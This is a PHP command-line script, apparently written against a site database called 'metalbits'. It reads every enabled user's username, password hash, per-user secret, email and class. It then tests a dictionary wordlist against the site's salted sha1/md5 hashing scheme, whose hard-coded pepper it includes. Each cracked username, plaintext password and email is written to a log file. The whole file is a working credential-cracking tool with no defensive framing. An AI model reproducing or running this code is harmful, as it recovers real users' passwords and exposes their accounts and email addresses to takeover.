bruteforce.phps

#!/usr/bin/php5
<?php
// return sha1(md5($Secret).$Str.sha1($Secret).';Sgv(dTUf&e9+eJrMx(.eL=;Xbf[mSD}');
// 
$start = $steptime = time();
set_time_limit(0);
ini_set(memory_limit, '100M');
mysql_connect('localhost', '','');
mysql_select_db('metalbits');

// Start at word #
if(ctype_digit($argv[1])) {
    $step = $argv[1];
} else { $step = 0; }

// Fetch # words at a time
if(ctype_digit($argv[2])) {
    $chunk = $argv[2];
} else { $chunk = 1000; }

$users = array();
$res = mysql_query('SELECT username, passhash, secret, email, class FROM users_main WHERE enabled="1"') or die(mysql_error());
while($row = mysql_fetch_assoc($res)) {
    $users[] = $row;
}
mysql_free_result($res);
$collected = count($users);
echo "Users collected: $collected\n";

mysql_select_db('dictionary');
$words = join('',mysql_fetch_row(mysql_query('SELECT COUNT(*) FROM md5')));

while($step <= $words) {
    $wordlist = array();
    $limit = ' LIMIT '.$step.','.$chunk;
    $res = mysql_query('SELECT str FROM md5'.$limit) or die(mysql_error());
    while($row=mysql_fetch_row($res)) {
        $wordlist[] = join('',$row);
    }
    $prog = round((($step/$words)*100),2);
    $chunks = (($words - $step) / $chunk); // Total amount of wordlist chunks left
    $timeleft = (time()-$steptime)*$chunks;
    $eta = time_diff(time(), time()+$timeleft, 2);
    $steptime = time();
    echo "Fetched words $step to ".($step+$chunk)." of $words, got: ".count($wordlist)." - progress($prog%) users left(".count($users).") eta($eta)\n";
    foreach($wordlist as $word) {
        for($u=0, $size = sizeof($users); $u < $size; ++$u) {
            $user = $users[$u];
            if($user['passhash'] == sha1(md5($user['secret']).$word.sha1($user['secret']).';Sgv(dTUf&e9+eJrMx(.eL=;Xbf[mSD}')) {
                writeLog("User: $user[username] Pass: $word Email: $user[email] Class: $user[class]");
                unset($users[$u]);
            }
        }
    }
    $step = $step + $chunk;
    unset($wordlist);
}

function writeLog($str, $type='both') {
    if($type=='both' || $type=='file') {
        $fd = fopen('bruteforce.log','a');
        fwrite($fd, $str."\n");
        fclose($fd);
    }
    if($type=='both') {
        echo "$str\n";
    }
}

function time_diff($PastTime,$FutureTime='',$Levels=2, $ShowAgo = false, $ShowSeconds = false, $Time = 0) {
    if(date('Y-m-d H:i:s', $PastTime) == '1999-11-30 00:00:00') {
        return 'Never';
    }
    if($FutureTime == '') { $FutureTime = time(); }

    if($FutureTime<$PastTime) {
        return false;
    }
    
    if(!$Time) {
        $Time=$FutureTime-$PastTime;
    }

    $Years=floor($Time/31556926); // seconds in a year
    $Remain = $Time - $Years*31556926;

    $Months = floor($Remain/2629744); // seconds in a month
    $Remain = $Remain - $Months*2629744;

    $Weeks = floor($Remain/604800); // seconds in a week
    $Remain = $Remain - $Weeks*604800;

    $Days = floor($Remain/86400); // seconds in a day
    $Remain = $Remain - $Days*86400;

    $Hours=floor($Remain/3600);
    $Remain = $Remain - $Hours*3600;

    $Minutes=floor($Remain/60);
    $Remain = $Remain - $Minutes*60;

    $Seconds=$Remain;

    $Return = '';

    if ($Years>0 && $Levels>0) {
        $Return.=$Years.'Y';
        //if ($Years>1) { $Return.='s'; }
        $Levels--;
    }

    if ($Months>0 && $Levels>0) {
        //if ($Return!='') { $Return.=', '; }
        $Return.=$Months.'M';
        //if ($Months>1) { $Return.='s'; }
        $Levels--;
    }

    if ($Weeks>0 && $Levels>0) {
        //if ($Return!="") { $Return.=', '; }
        $Return.=$Weeks.'w';
        //if ($Weeks>1) { $Return.='s'; }
        $Levels--;
    }

    if ($Days>0 && $Levels>0) {
        //if ($Return!='') { $Return.=', '; }
        $Return.=$Days.'d';
        //if ($Days>1) { $Return.='s'; }
        $Levels--;
    }

    if ($Hours>0 && $Levels>0) {
        //if ($Return!='') { $Return.=', '; }
        $Return.=$Hours.'h';
        //if ($Hours>1) { $Return.='s'; }
        $Levels--;
    }

    if ($Minutes>0 && $Levels>0) {
        //if ($Return!='') { $Return.=' and '; }
        $Return.=$Minutes.'m';
        //if ($Minutes>1) { $Return.='s'; }
        $Levels--;
    }
    if($ShowSeconds && $Seconds>0 && $Levels>0) {
        //if ($Return!='') { $Return.=' and '; }
        $Return.=$Seconds.'s';
        //if ($Seconds>1) { $Return.='s'; }
        $Levels--;
    }

    if($Return == '') {
        $Return = 'N/A';
    } elseif($ShowAgo) {
        //$Return.=' ago';
    }
    return $Return;
}

?>